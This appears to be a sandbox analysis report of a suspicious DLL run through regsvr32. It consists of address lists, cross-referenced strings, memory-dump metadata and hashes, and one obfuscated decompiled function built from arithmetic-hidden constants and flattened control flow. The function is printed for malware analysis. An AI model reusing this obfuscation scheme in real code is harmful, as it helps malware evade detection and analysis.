0x10017ba0
0x10017bab
0x10017bb6
0x10017bc1
0x10017bc9
0x10017bd4
0x10017bdf
0x10017bf2
0x10017bfb
0x10017c06
0x10017c11
0x10017c1c
0x10017c27
0x10017c3a
0x10017c3d
0x10017c40
0x10017c47
0x10017c52
0x10017c68
0x10017c77
0x10017c7e
0x10017c89
0x10017c91
0x10017ca1
0x10017ca5
0x10017caa
0x10017cb2
0x10017cba
0x10017cc3
0x10017cc8
0x10017cce
0x10017cd6
0x10017cde
0x10017ce9
0x10017cf1
0x10017cfc
0x10017d07
0x10017d13
0x10017d16
0x10017d1a
0x10017d22
0x10017d27
0x10017d2f
0x10017d3a
0x10017d45
0x10017d4c
0x10017d57
0x10017d6a
0x10017d71
0x10017d7c
0x10017d95
0x10017da0
0x10017dab
0x10017db6
0x10017dc3
0x10017dce
0x10017dd9
0x10017de1
0x10017dec
0x10017df7
0x10017dff
0x10017e0a
0x10017e15
0x10017e20
0x10017e2b
0x10017e36
0x10017e41
0x10017e49
0x10017e54
0x10017e63
0x10017e66
0x10017e6a
0x10017e77
0x10017e7b
0x10017e83
0x10017e8e
0x10017e99
0x10017ea1
0x10017eac
0x10017ebc
0x10017ec0
0x10017ec5
0x10017eca
0x10017ed2
0x10017ee5
0x10017ee8
0x10017eef
0x10017efa
0x10017f05
0x10017f15
0x10017f19
0x10017f1e
0x10017f23
0x10017f2b
0x10017f38
0x10017f39
0x10017f3d
0x10017f45
0x10017f4d
0x10017f55
0x10017f5d
0x10017f65
0x10017f70
0x10017f74
0x10017f7c
0x10017f87
0x10017f92
0x10017f9d
0x10017fa8
0x10017fb3
0x10017fbe
0x10017fc6
0x10017fcb
0x10017fcf
0x10017fd4
0x10017fdc
0x10017fef
0x10017ff6
0x10018003
0x1001800e
0x10018016
0x10018021
0x1001802c
0x10018037
0x10018042
0x1001804a
0x10018058
0x1001805d
0x10018061
0x10018069
0x10018071
0x10018086
0x10018089
0x10018090
0x1001809b
0x100180a6
0x100180b1
0x100180bc
0x100180d5
0x100180e0
0x100180eb
0x100180f3
0x10018100
0x10018104
0x1001810c
0x10018114
0x1001811f
0x10018132
0x10018139
0x10018144
0x10018157
0x10018158
0x1001815f
0x1001816a
0x10018175
0x10018180
0x1001818b
0x10018193
0x1001819e
0x100181a9
0x100181b4
0x100181bf
0x100181ca
0x100181da
0x100181e1
0x100181ec
0x100181f4
0x100181fc
0x1001820a
0x1001820e
0x10018216
0x1001821e
0x10018226
0x1001822e
0x10018233
0x1001823b
0x10018243
0x1001824b
0x10018259
0x1001825a
0x1001825f
0x10018264
0x10018268
0x10018270
0x10018278
0x10018286
0x1001828a
0x1001828f
0x10018297
0x100182aa
0x100182b1
0x100182b9
0x100182c4
0x100182d7
0x100182de
0x100182e9
0x100182f4
0x100182fc
0x10018307
0x10018307
0x10018307
0x1001830c
0x10018311
0x10018316
0x10018316
0x10018316
0x10018316
0x10018318
0x00000000
0x00000000
0x1001831e
0x10018496
0x100184a2
0x100184a9
0x100184b7
0x100184cf
0x10018505
0x1001852b
0x1001852f
0x10018534
0x00000000
0x10018324
0x1001832a
0x10018479
0x10018489
0x1001848f
0x00000000
0x10018330
0x10018332
0x10018453
0x10018454
0x1001845d
0x10018467
0x1001846e
0x10018471
0x10018307
0x10018307
0x10018307
0x1001830c
0x10018311
0x00000000
0x10018311
0x10018338
0x1001833e
0x1001843b
0x00000000
0x10018344
0x10018346
0x1001834c
0x10018358
0x1001835f
0x10018372
0x1001837b
0x10018389
0x1001839b
0x100183c1
0x100183d5
0x100183fd
0x10018402
0x1001840c
0x10018415
0x1001840e
0x10018410
0x10018412
0x10018412
0x1001842a
0x10018431
0x10018431
0x100187bb
0x100187bb
0x100187c0
0x100187c5
0x100187c5
0x10018346
0x1001833e
0x10018332
0x1001832a
0x00000000
0x1001831e
0x1001853e
0x100187ae
0x100187b3
0x100187b6
0x00000000
0x10018544
0x1001854a
0x100186bc
0x100186c5
0x100186cc
0x100186da
0x100186df
0x100186ed
0x100186f4
0x10018730
0x1001875f
0x10018763
0x1001877e
0x10018783
0x00000000
0x10018550
0x10018552
0x10018558
0x10018564
0x10018568
0x10018573
0x10018578
0x10018584
0x10018586
0x1001858a
0x10018595
0x100185a8
0x100185c1
0x100185cd
0x100185d5
0x100185e3
0x100185ee
0x100185fc
0x10018611
0x10018662
0x1001868a
0x10018692
0x100186aa
0x100186af
0x100186b2
0x100186b2
0x00000000
0x100186b2
0x10018552
0x1001854a
0x100187ca
0x100187ca
0x100187e2
0x100187e2

Strings

:M, xrefs: 10017A69
.,, xrefs: 1001779E
BXG, xrefs: 100174CA
O,, xrefs: 100182FC
B3, xrefs: 1001809B
"e, xrefs: 10017AF1
VZS, xrefs: 10017B09
Lx, xrefs: 10018673
kA], xrefs: 10017A84
CCu, xrefs: 10017C1C
X)oL, xrefs: 100174B4
3a, xrefs: 1001784F
|3, xrefs: 10017989
Lx, xrefs: 100186B2
,\2, xrefs: 10017AC0
T, xrefs: 10017E15
fjH, xrefs: 100178A3
c[N, xrefs: 10017B7F
(/_, xrefs: 100180EB
Lx, xrefs: 1001825F

Memory Dump Source

Source File: 00000003.00000002.421118824.0000000010001000.00000020.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.421096489.0000000010000000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.421354772.0000000010024000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: "e$(/_$,\2$.,$3a$:M$B3$BXG$CCu$Lx$Lx$Lx$O,$VZS$X)oL$c[N$fjH$kA]$T$|3
API String ID: 0-85424482
Opcode ID: 397680fab286f05c81e5dfe2dfa350151be2447b68e5002513b9542597b9c80b
Instruction ID: b3be822d701b88f99c4231caf753b47dceb3926f7070d3d012a52a1ded806d07
Opcode Fuzzy Hash: 397680fab286f05c81e5dfe2dfa350151be2447b68e5002513b9542597b9c80b
Instruction Fuzzy Hash: 26A2ED71509381CBD379CF21C94AB9BBBE2FBC5708F10891DE5998A260DBB58949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 1000A01C Relevance: 24.5, Strings: 19, Instructions: 702
COMMONCrypto

Download Yara Rule

C-Code - Quality: 86%

			E1000A01C(signed int __edx, intOrPtr _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr* _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40) {
				signed int _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				intOrPtr _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				void* __ecx;
				intOrPtr _t808;
				intOrPtr _t810;
				intOrPtr _t811;
				void* _t833;
				void* _t834;
				signed int _t836;
				signed int _t837;
				signed int _t838;
				signed int _t839;
				signed int _t840;
				signed int _t841;
				signed int _t842;
				signed int _t843;
				signed int _t844;
				signed int _t845;
				signed int _t846;
				signed int _t847;
				signed int _t848;
				signed int _t849;
				signed int _t850;
				signed int _t851;
				signed int _t852;
				void* _t853;
				signed int _t865;
				intOrPtr* _t875;
				intOrPtr _t876;
				void* _t927;
				signed int _t943;
				signed int _t945;
				signed int _t947;
				char _t952;
				signed int* _t954;
				void* _t957;

				_push(_a40);
				_push(_a36);
				_v20 = __edx;
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx & 0x0000ffff);
				E10009E7D(__edx & 0x0000ffff);
				_v16 = 0xd3cb38;
				_v4 = _v4 & 0;
				_t954 =  &(( &_v300)[0xc]);
				_v12 = 0x9c4131;
				_v8 = 0x6bb45c;
				_t834 = 0;
				_v292 = 0x87e64f;
				_t945 = 0x5723c3a;
				_v292 = _v292 >> 1;
				_v292 = _v292 ^ 0x0043f327;
				_v108 = 0x9fb12e;
				_v108 = _v108 >> 4;
				_v108 = _v108 ^ 0x0009fb01;
				_v136 = 0x9ef7f9;
				_v136 = _v136 + 0xffff5ae2;
				_v136 = _v136 + 0xffffbc14;
				_v136 = _v136 ^ 0x009e0e27;
				_v200 = 0xef93d0;
				_v28 = 0;
				_t943 = 0x7b;
				_v200 = _v200 / _t943;
				_v200 = _v200 ^ 0x7f86db29;
				_v200 = _v200 ^ 0x7f87a988;
				_v164 = 0x9d0d18;
				_t836 = 0x6e;
				_v164 = _v164 / _t836;
				_v164 = _v164 + 0xfffffcb7;
				_v164 = _v164 ^ 0x00012a37;
				_v148 = 0xdc8bea;
				_v148 = _v148 >> 0x10;
				_v148 = _v148 / _t943;
				_v148 = _v148 ^ 0x00400001;
				_v68 = 0x7ad858;
				_v68 = _v68 + 0x2b45;
				_v68 = _v68 ^ 0x007f039d;
				_v172 = 0xe0fdcf;
				_v172 = _v172 * 0x52;
				_v172 = _v172 | 0x99b09916;
				_v172 = _v172 ^ 0xddb1dd5e;
				_v140 = 0x74c84c;
				_v140 = _v140 + 0x3368;
				_v140 = _v140 + 0x42ff;
				_v140 = _v140 ^ 0x007d3eb3;
				_v44 = 0x77c345;
				_v44 = _v44 | 0x629d11a2;
				_v44 = _v44 ^ 0x62ffd1e7;
				_v180 = 0x8d4c0;
				_v180 = _v180 ^ 0x33cc92fa;
				_v180 = _v180 ^ 0xbd1877c5;
				_v180 = _v180 ^ 0x8edc30ff;
				_v76 = 0x3e4f81;
				_v76 = _v76 | 0xa5fff28a;
				_v76 = _v76 ^ 0x25ffff8b;
				_v36 = 0x3d2f3c;
				_v36 = _v36 >> 8;
				_v36 = _v36 ^ 0x00003d2f;
				_v112 = 0xe03a96;
				_v112 = _v112 ^ 0x63b37d33;
				_v112 = _v112 ^ 0x635347e4;
				_v96 = 0x7e47;
				_v96 = _v96 + 0x9433;
				_v96 = _v96 ^ 0x00011265;
				_v88 = 0xd0634c;
				_v88 = _v88 + 0xd456;
				_v88 = _v88 ^ 0x00d137bd;
				_v216 = 0xd4da4b;
				_v216 = _v216 + 0xffff851a;
				_t837 = 0x46;
				_v216 = _v216 / _t837;
				_v216 = _v216 | 0x95fb5793;
				_v216 = _v216 ^ 0x95fb5fbc;
				_v264 = 0x744f30;
				_v264 = _v264 + 0x9771;
				_v264 = _v264 ^ 0x8ec0028c;
				_v264 = _v264 + 0xffff555e;
				_v264 = _v264 ^ 0x8eb4388b;
				_v128 = 0xd1a862;
				_v128 = _v128 | 0x88c83df8;
				_v128 = _v128 << 8;
				_v128 = _v128 ^ 0xd9bdfa00;
				_v208 = 0x988a92;
				_v208 = _v208 + 0xfd4d;
				_v208 = _v208 << 0xf;
				_v208 = _v208 >> 7;
				_v208 = _v208 ^ 0x0187df00;
				_v300 = 0xce097a;
				_v300 = _v300 | 0x8952db64;
				_v300 = _v300 << 3;
				_t838 = 0x63;
				_v300 = _v300 * 0x64;
				_v300 = _v300 ^ 0xd861c1a9;
				_v300 = 0x4d307;
				_v300 = _v300 | 0xef9fb3ce;
				_v300 = _v300 + 0xffff7260;
				_v300 = _v300 ^ 0x684f51c7;
				_v300 = _v300 ^ 0x87d5f332;
				_v300 = 0xd54d6d;
				_v300 = _v300 + 0xffff24a2;
				_v300 = _v300 * 0x72;
				_v300 = _v300 ^ 0xb01f2bc4;
				_v300 = _v300 ^ 0xee81aa94;
				_v300 = 0xe31882;
				_v300 = _v300 / _t838;
				_v300 = _v300 >> 1;
				_v300 = _v300 + 0xffff024c;
				_v300 = _v300 ^ 0x0004ae7f;
				_v300 = 0x340e66;
				_v300 = _v300 | 0xfc424d31;
				_v300 = _v300 * 0x15;
				_v300 = _v300 >> 0xd;
				_v300 = _v300 ^ 0x0008acd2;
				_v296 = 0x5baa19;
				_v296 = _v296 << 3;
				_v296 = _v296 * 0x25;
				_v296 = _v296 ^ 0x69fb3051;
				_v300 = 0x7f876;
				_v300 = _v300 + 0xbae3;
				_v300 = _v300 << 0xa;
				_t839 = 0x32;
				_v300 = _v300 * 0x27;
				_v300 = _v300 ^ 0x4d4d52cd;
				_v300 = 0x85a55;
				_v300 = _v300 ^ 0x416febc1;
				_v300 = _v300 / _t839;
				_v300 = _v300 << 8;
				_v300 = _v300 ^ 0x4ed01590;
				_v300 = 0x36745f;
				_t241 =  &_v300; // 0x36745f
				_t840 = 0x7e;
				_v300 =  *_t241 * 0x49;
				_v300 = _v300 + 0xffff0e9e;
				_v300 = _v300 / _t840;
				_v300 = _v300 ^ 0x001dc29e;
				_v296 = 0xd3f523;
				_v296 = _v296 + 0x9fd7;
				_v296 = _v296 << 9;
				_v296 = _v296 ^ 0xa92b3c75;
				_v296 = 0xb79e64;
				_v296 = _v296 >> 0xf;
				_v296 = _v296 >> 0xf;
				_v296 = _v296 ^ 0x0003f679;
				_v300 = 0x45157a;
				_v300 = _v300 ^ 0xc6da19f3;
				_t841 = 0x34;
				_v300 = _v300 / _t841;
				_v300 = _v300 << 0xc;
				_v300 = _v300 ^ 0x1d353970;
				_v212 = 0xb2693f;
				_t842 = 0x48;
				_v212 = _v212 / _t842;
				_v212 = _v212 + 0xfffff14f;
				_v212 = _v212 >> 2;
				_v212 = _v212 ^ 0x00091ca0;
				_v276 = 0xe56f73;
				_v276 = _v276 + 0xffffe05b;
				_v276 = _v276 << 2;
				_t843 = 0xf;
				_v276 = _v276 / _t843;
				_v276 = _v276 ^ 0x003b6e75;
				_v100 = 0xe8d1b7;
				_v100 = _v100 | 0x3d6de118;
				_v100 = _v100 ^ 0x3deceb65;
				_v124 = 0x5262d6;
				_v124 = _v124 ^ 0xf3bd74e8;
				_v124 = _v124 ^ 0xf3eeac43;
				_v196 = 0xbaa48d;
				_v196 = _v196 + 0xfcf3;
				_v196 = _v196 >> 1;
				_v196 = _v196 ^ 0x0058bee1;
				_v132 = 0x20f3e;
				_v132 = _v132 + 0x66bf;
				_v132 = _v132 + 0xbcdc;
				_v132 = _v132 ^ 0x0001a471;
				_v268 = 0x6382f1;
				_v268 = _v268 ^ 0x9dea040c;
				_v268 = _v268 >> 6;
				_v268 = _v268 + 0xb086;
				_v268 = _v268 ^ 0x027f7142;
				_v224 = 0xfb4781;
				_t844 = 0x5c;
				_v224 = _v224 * 3;
				_v224 = _v224 >> 1;
				_v224 = _v224 ^ 0x99d002b9;
				_v224 = _v224 ^ 0x98aee71c;
				_v48 = 0x206612;
				_v48 = _v48 >> 0xa;
				_v48 = _v48 ^ 0x000a76c2;
				_v60 = 0xa35a53;
				_v60 = _v60 | 0xc3895e16;
				_v60 = _v60 ^ 0xc3a79d90;
				_v252 = 0x92306d;
				_v252 = _v252 * 0x37;
				_v252 = _v252 << 0xb;
				_v252 = _v252 / _t844;
				_v252 = _v252 ^ 0x00bfbb4f;
				_v192 = 0x59aec3;
				_v192 = _v192 << 2;
				_t845 = 0x41;
				_v192 = _v192 / _t845;
				_v192 = _v192 ^ 0x000be600;
				_v156 = 0xf4f50;
				_v156 = _v156 >> 8;
				_v156 = _v156 ^ 0xae77e692;
				_v156 = _v156 ^ 0xae7602ac;
				_v260 = 0x654807;
				_v260 = _v260 + 0xf0ca;
				_v260 = _v260 + 0xffff3881;
				_v260 = _v260 | 0xc9efa320;
				_v260 = _v260 ^ 0xc9e00061;
				_v40 = 0xc8ffbf;
				_t846 = 0x3a;
				_v40 = _v40 * 0x28;
				_v40 = _v40 ^ 0x1f6d14a1;
				_v188 = 0xa37d27;
				_v188 = _v188 | 0x7edb66fd;
				_v188 = _v188 ^ 0x7ef1a21d;
				_v288 = 0xe2c9ff;
				_v288 = _v288 + 0xffffec98;
				_v288 = _v288 / _t846;
				_v288 = _v288 >> 0xd;
				_v288 = _v288 ^ 0x00092fce;
				_v220 = 0xb87ebf;
				_v220 = _v220 << 0xa;
				_v220 = _v220 + 0xfffff71b;
				_v220 = _v220 >> 6;
				_v220 = _v220 ^ 0x0381e418;
				_v176 = 0xa2eaf8;
				_v176 = _v176 << 0xa;
				_v176 = _v176 ^ 0xa004ed2e;
				_v176 = _v176 ^ 0x2ba2b361;
				_v184 = 0x299ce8;
				_v184 = _v184 + 0xffffca67;
				_v184 = _v184 >> 4;
				_v184 = _v184 ^ 0x0005baad;
				_v204 = 0xcd126a;
				_v204 = _v204 << 0xd;
				_t847 = 0x1c;
				_v204 = _v204 / _t847;
				_v204 = _v204 ^ 0x05c055be;
				_v120 = 0x764b60;
				_v120 = _v120 << 7;
				_v120 = _v120 ^ 0x3b2eb955;
				_v160 = 0x72d77b;
				_v160 = _v160 + 0xd221;
				_t848 = 0x7d;
				_v160 = _v160 / _t848;
				_v160 = _v160 ^ 0x00021a59;
				_v168 = 0x6efe41;
				_v168 = _v168 + 0x5a4a;
				_v168 = _v168 + 0x6de0;
				_v168 = _v168 ^ 0x006bcb86;
				_v228 = 0xbe695d;
				_v228 = _v228 >> 1;
				_v228 = _v228 | 0xe9c3ea66;
				_v228 = _v228 + 0xffff0d0a;
				_v228 = _v228 ^ 0xe9d415b5;
				_v104 = 0x557e4d;
				_v104 = _v104 | 0x6a6400f1;
				_v104 = _v104 ^ 0x6a7b4193;
				_v280 = 0x4969f9;
				_v280 = _v280 >> 8;
				_v280 = _v280 + 0xffffe2aa;
				_v280 = _v280 + 0x5c83;
				_v280 = _v280 ^ 0x000d6629;
				_v284 = 0xdd9e29;
				_t849 = 0x62;
				_v284 = _v284 * 0x43;
				_v284 = _v284 ^ 0xa5c4afeb;
				_v284 = _v284 >> 3;
				_v284 = _v284 ^ 0x13f10888;
				_v144 = 0xb229aa;
				_v144 = _v144 * 0xb;
				_v144 = _v144 + 0xffff1175;
				_v144 = _v144 ^ 0x07a27be9;
				_v152 = 0x71f40b;
				_v152 = _v152 + 0xffff3226;
				_v152 = _v152 >> 0x10;
				_v152 = _v152 ^ 0x000d1b5a;
				_v272 = 0xad718b;
				_v272 = _v272 << 9;
				_v272 = _v272 | 0x106efdf6;
				_v272 = _v272 + 0xffffc215;
				_v272 = _v272 ^ 0x5ae255bb;
				_v256 = 0xb52926;
				_v256 = _v256 * 0x49;
				_v256 = _v256 | 0x234ac4f4;
				_v256 = _v256 + 0x8d8;
				_v256 = _v256 ^ 0x33e2ff8e;
				_v296 = 0x893f42;
				_v296 = _v296 << 3;
				_v296 = _v296 | 0x3f545e34;
				_v296 = _v296 ^ 0x3f584cbd;
				_v72 = 0x798d91;
				_v72 = _v72 * 0x22;
				_v72 = _v72 ^ 0x102c7d47;
				_v84 = 0xcb7f5c;
				_v84 = _v84 << 5;
				_v84 = _v84 ^ 0x196ef5f3;
				_v236 = 0x7d6204;
				_v236 = _v236 / _t849;
				_v236 = _v236 + 0xffff5890;
				_t850 = 0x6c;
				_v236 = _v236 / _t850;
				_v236 = _v236 ^ 0x0005340a;
				_v52 = 0x9d0635;
				_t851 = 0x38;
				_v52 = _v52 * 0x45;
				_v52 = _v52 ^ 0x2a5862ca;
				_v92 = 0xb243d8;
				_v92 = _v92 >> 3;
				_v92 = _v92 ^ 0x0016d741;
				_v64 = 0x3f9348;
				_v64 = _v64 + 0x2124;
				_v64 = _v64 ^ 0x0037cc9f;
				_v240 = 0xae8611;
				_v240 = _v240 / _t851;
				_v240 = _v240 + 0xffff28d2;
				_v240 = _v240 << 5;
				_v240 = _v240 ^ 0x0045c5c8;
				_v248 = 0x22dc07;
				_v248 = _v248 + 0xffff2699;
				_v248 = _v248 + 0xdabd;
				_v248 = _v248 >> 0xa;
				_v248 = _v248 ^ 0x000efb22;
				_v244 = 0xd9f642;
				_v244 = _v244 | 0x77642f67;
				_v244 = _v244 >> 7;
				_v244 = _v244 | 0x837e79ae;
				_v244 = _v244 ^ 0x83fd10ed;
				_v32 = 0x4289e8;
				_v32 = _v32 ^ 0x05aab469;
				_v32 = _v32 ^ 0x05e90be9;
				_v116 = 0xa88774;
				_v116 = _v116 << 0xd;
				_v116 = _v116 ^ 0x10eb813f;
				_v292 = 0x5e419c;
				_v292 = _v292 + 0x1de5;
				_v292 = _v292 ^ 0x0054ea57;
				_v300 = 0x40f33c;
				_v300 = _v300 << 2;
				_v300 = _v300 >> 0x10;
				_t852 = 0x5e;
				_v300 = _v300 / _t852;
				_v300 = _v300 ^ 0x0004493f;
				_v56 = 0xc2485e;
				_v56 = _v56 + 0xffff2a1b;
				_v56 = _v56 ^ 0x00c7974c;
				_t944 = _v24;
				_t952 = _v24;
				while(1) {
					L1:
					_t853 = 0x826f267;
					while(1) {
						L2:
						while(1) {
							L3:
							_t957 = _t945 - 0x705f5e7;
							if(_t957 > 0) {
								goto L16;
							}
							L4:
							if(_t957 == 0) {
								E10005B8A(_t944, _v108);
								_t927 = 0x566262b;
								_t808 = _v232;
								_t853 = 0x826f267;
								_t945 =  ==  ? 0x566262b : 0x7c43c2c;
								while(1) {
									L3:
									_t957 = _t945 - 0x705f5e7;
									if(_t957 > 0) {
										goto L16;
									}
									goto L4;
								}
								goto L16;
							}
							if(_t945 == 0x2520e4a) {
								E10015B4C(_v244, _t808, _v32, _v116);
								_t945 = 0x93f969a;
								while(1) {
									L1:
									_t853 = 0x826f267;
									L2:
									goto L3;
								}
							}
							if(_t945 == 0x32b6253) {
								_push(_v192);
								_push(_v216);
								_push(_v252);
								_t808 = E10005797(_v208, _t952, _t853, _v224, _t853, _v20, _t853, _v48, _v60, _a36);
								_t954 =  &(_t954[0xb]);
								_v232 = _t808;
								_t853 = 0x826f267;
								_t945 =  !=  ? 0x826f267 : 0x93f969a;
								goto L2;
							}
							if(_t945 == 0x3a22602) {
								_t945 = 0xeb2e958;
								continue;
							}
							if(_t945 == _t927) {
								E100141CF(_t944, _a16);
								_t945 = 0x7c43c2c;
								_t833 = 1;
								_t834 =  !=  ? _t833 : _t834;
								while(1) {
									L1:
									_t853 = 0x826f267;
									goto L2;
								}
							}
							if(_t945 != 0x5723c3a) {
								L38:
								if(_t945 == 0x28d67b6) {
									L41:
									return _t834;
								}
								_t808 = _v232;
								continue;
							}
							_t945 = 0x3a22602;
							continue;
							L16:
							if(_t945 == 0x7c43c2c) {
								E10015B4C(_v64, _t944, _v240, _v248);
								_t945 = 0x2520e4a;
								L37:
								_t927 = 0x566262b;
								_t853 = 0x826f267;
								goto L38;
							}
							if(_t945 == _t853) {
								if( *_a20 == 0) {
									_t810 = _v28;
								} else {
									_push(_v188);
									_push(_v40);
									_push(_v260);
									_t810 = E10004BB4(0x1000180c, _v156);
									_t954 =  &(_t954[3]);
									_v28 = _t810;
								}
								_t865 = _v76 | _v180 | _v44 | _v140 | _v172 | _v68 | _v148 | _v164 | _v200;
								_t947 = _a8 & 1;
								if(_t947 != 0) {
									_t865 = _t865 | 0x00803000;
								}
								_t811 = E1001AEAE(_v232, _a28, _v288, _t865, _v220, _t865, _v176, _t810, _v184, _t865, _t865, _v204, _v120);
								_t944 = _t811;
								E1000B9D7(_v160, _v168, _v28, _v228);
								_t954 =  &(_t954[0xe]);
								if(_t811 == 0) {
									_t945 = 0x2520e4a;
								} else {
									_v80 = 1;
									E1001E29A(_v104, _t944, _v280, 4, _v284,  &_v80, _v112);
									_t954 =  &(_t954[5]);
									if(_t947 != 0) {
										E1001B215( &_v24,  &_v80, _v96, _v144, _v152, _t944, _v272);
										_v80 = _v80 | _v264;
										E1001E29A(_v256, _t944, _v296, _v24, _v72,  &_v80, _v88);
										_t954 =  &(_t954[0xa]);
									}
									_t945 = 0xc95e1b3;
								}
								while(1) {
									L1:
									_t853 = 0x826f267;
									goto L2;
								}
							}
							if(_t945 == 0x93f969a) {
								E10015B4C(_v292, _t952, _v300, _v56);
								goto L41;
							}
							if(_t945 == 0xc95e1b3) {
								_t875 = _a20;
								_t823 =  *_t875;
								if( *_t875 == 0) {
									_t876 = 0;
								} else {
									_t876 =  *((intOrPtr*)(_t875 + 4));
								}
								_push(_t876);
								E1000400F(_t876, _t944, _v84, _v236, _t823, _v52, _a12, _v92);
								_t954 =  &(_t954[7]);
								asm("sbb esi, esi");
								_t945 = (_t945 & 0xff41b9bb) + 0x7c43c2c;
								goto L1;
							}
							if(_t945 != 0xeb2e958) {
								goto L38;
							}
							_push(_v196);
							_push(_v128);
							_push(_v124);
							_push(_v100);
							_push(_v276);
							_t952 = E10006505(_v36, _v212);
							_t945 =  !=  ? 0x32b6253 : 0x28d67b6;
							E10006A8D(_v132, _v268, 0);
							_t954 = _t954 - 0xc + 0x24;
							goto L37;
						}
					}
				}
			}

0x1000a026
0x1000a02f
0x1000a036
0x1000a03d
0x1000a047
0x1000a04e
0x1000a055
0x1000a05c
0x1000a063
0x1000a06a
0x1000a071
0x1000a078
0x1000a07a
0x1000a07f
0x1000a08c
0x1000a093
0x1000a096
0x1000a0a3
0x1000a0ae
0x1000a0b0
0x1000a0b8
0x1000a0bd
0x1000a0c1
0x1000a0c9
0x1000a0d4
0x1000a0dc
0x1000a0e7
0x1000a0f2
0x1000a0fd
0x1000a108
0x1000a113
0x1000a11b
0x1000a128
0x1000a12d
0x1000a131
0x1000a139
0x1000a141
0x1000a155
0x1000a15a
0x1000a161
0x1000a16c
0x1000a177
0x1000a182
0x1000a193
0x1000a19a
0x1000a1a5
0x1000a1b0
0x1000a1bb
0x1000a1c6
0x1000a1d9
0x1000a1e0
0x1000a1eb
0x1000a1f6
0x1000a201
0x1000a20c
0x1000a217
0x1000a222
0x1000a22d
0x1000a238
0x1000a243
0x1000a24e
0x1000a259
0x1000a266
0x1000a271
0x1000a27c
0x1000a287
0x1000a292
0x1000a29d
0x1000a2a5
0x1000a2b0
0x1000a2bb
0x1000a2c6
0x1000a2d1
0x1000a2dc
0x1000a2e7
0x1000a2f2
0x1000a2fd
0x1000a308
0x1000a313
0x1000a31b
0x1000a329
0x1000a32e
0x1000a334
0x1000a33c
0x1000a344
0x1000a34c
0x1000a354
0x1000a35c
0x1000a364
0x1000a36c
0x1000a377
0x1000a382
0x1000a38a
0x1000a395
0x1000a39d
0x1000a3a5
0x1000a3aa
0x1000a3af
0x1000a3b7
0x1000a3bf
0x1000a3c7
0x1000a3d1
0x1000a3d2
0x1000a3d6
0x1000a3de
0x1000a3e6
0x1000a3ee
0x1000a3f6
0x1000a3fe
0x1000a406
0x1000a40e
0x1000a41b
0x1000a41f
0x1000a427
0x1000a42f
0x1000a43d
0x1000a441
0x1000a445
0x1000a44d
0x1000a455
0x1000a45d
0x1000a46a
0x1000a46e
0x1000a473
0x1000a47b
0x1000a483
0x1000a48d
0x1000a491
0x1000a499
0x1000a4a1
0x1000a4a9
0x1000a4b7
0x1000a4ba
0x1000a4be
0x1000a4c6
0x1000a4ce
0x1000a4de
0x1000a4e2
0x1000a4e7
0x1000a4ef
0x1000a4f7
0x1000a4fc
0x1000a4ff
0x1000a503
0x1000a513
0x1000a517
0x1000a51f
0x1000a527
0x1000a52f
0x1000a534
0x1000a53c
0x1000a544
0x1000a549
0x1000a54e
0x1000a556
0x1000a55e
0x1000a56a
0x1000a56f
0x1000a575
0x1000a57a
0x1000a582
0x1000a58e
0x1000a593
0x1000a599
0x1000a5a1
0x1000a5a6
0x1000a5ae
0x1000a5b6
0x1000a5be
0x1000a5c7
0x1000a5ca
0x1000a5ce
0x1000a5d6
0x1000a5e1
0x1000a5ec
0x1000a5f7
0x1000a602
0x1000a60d
0x1000a618
0x1000a620
0x1000a628
0x1000a62c
0x1000a634
0x1000a63f
0x1000a64a
0x1000a655
0x1000a660
0x1000a668
0x1000a670
0x1000a675
0x1000a67d
0x1000a687
0x1000a696
0x1000a699
0x1000a69d
0x1000a6a1
0x1000a6a9
0x1000a6b1
0x1000a6bc
0x1000a6c4
0x1000a6cf
0x1000a6da
0x1000a6e5
0x1000a6f0
0x1000a6fd
0x1000a701
0x1000a70e
0x1000a712
0x1000a71a
0x1000a725
0x1000a734
0x1000a739
0x1000a742
0x1000a74d
0x1000a758
0x1000a760
0x1000a76b
0x1000a776
0x1000a77e
0x1000a786
0x1000a78e
0x1000a796
0x1000a79e
0x1000a7b1
0x1000a7b4
0x1000a7bb
0x1000a7c6
0x1000a7d1
0x1000a7dc
0x1000a7e7
0x1000a7ef
0x1000a7ff
0x1000a803
0x1000a808
0x1000a810
0x1000a818
0x1000a81d
0x1000a825
0x1000a82a
0x1000a832
0x1000a83d
0x1000a845
0x1000a850
0x1000a85b
0x1000a866
0x1000a871
0x1000a879
0x1000a884
0x1000a88c
0x1000a895
0x1000a898
0x1000a89c
0x1000a8a4
0x1000a8b1
0x1000a8b9
0x1000a8c4
0x1000a8cf
0x1000a8e3
0x1000a8e8
0x1000a8f1
0x1000a8fc
0x1000a907
0x1000a912
